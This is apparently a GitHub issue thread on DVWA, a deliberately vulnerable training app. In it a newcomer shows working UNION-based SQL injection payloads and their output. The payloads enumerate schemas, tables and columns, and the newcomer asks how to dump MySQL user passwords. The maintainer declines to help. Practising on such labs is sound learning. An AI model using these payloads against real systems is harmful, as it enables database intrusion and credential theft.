### ISSUE TITLE
SQL Injection Question

### ISSUE THREAD

**Issue by UserL1** [ethicalhack3r/DVWA#97]
Hi, New to SQL injection.

I have a question. I was trying to access certain table in dvwa DB. Cannot dump the columns of that table. What am I doing worng? I will show the issue visually here:

1. I listed the schemas in DVWA DB using:
**'union** select null,schema_name from information_schema.schemata# 
**Output**:
ID: 'union select null,schema_name from information_schema.schemata#
First name: 
Surname: information_schema
ID: 'union select null,schema_name from information_schema.schemata#
First name: 
Surname: dvwa
ID: 'union select null,schema_name from information_schema.schemata#
First name: 
Surname: mysql
ID: 'union select null,schema_name from information_schema.schemata#
First name: 
Surname: performance_schema

2. Next, I dumped the tables under information_schema using: 
**'union select null,table_name from information_schema.tables where table_name like 'user%'#**
First name: 
Surname: USER_PRIVILEGES
ID: 'union select null,table_name from information_schema.tables where table_name like 'user%'#
First name: 
Surname: users
ID: 'union select null,table_name from information_schema.tables where table_name like 'user%'#
First name: 
Surname: user

3. Thereafter I dumped the columns from table user using:
**'union** select table_name,column_name from information_schema.columns where table_name='user'#**
**Output**

ID: 'union select table_name,column_name from information_schema.columns where table_name='user'#
First name: user
Surname: Host
ID: 'union select table_name,column_name from information_schema.columns where table_name='user'#
First name: user
Surname: User
ID: 'union select table_name,column_name from information_schema.columns where table_name='user'#
First name: user
Surname: Password
ID: 'union select table_name,column_name from information_schema.columns where table_name='user'#
First name: user
Surname: Select_priv 
....Output Trimmed

4. Now I want to dump the contents of columns Users and Password form user table, I am not able to do so. Can you tell me what query to use? Are there restrictions on this table's columns?

**Comment by ethicalhack3r** [comment]
Hi, issues should be for bugs or feature requests only, not help. There are many tutorials online for that.
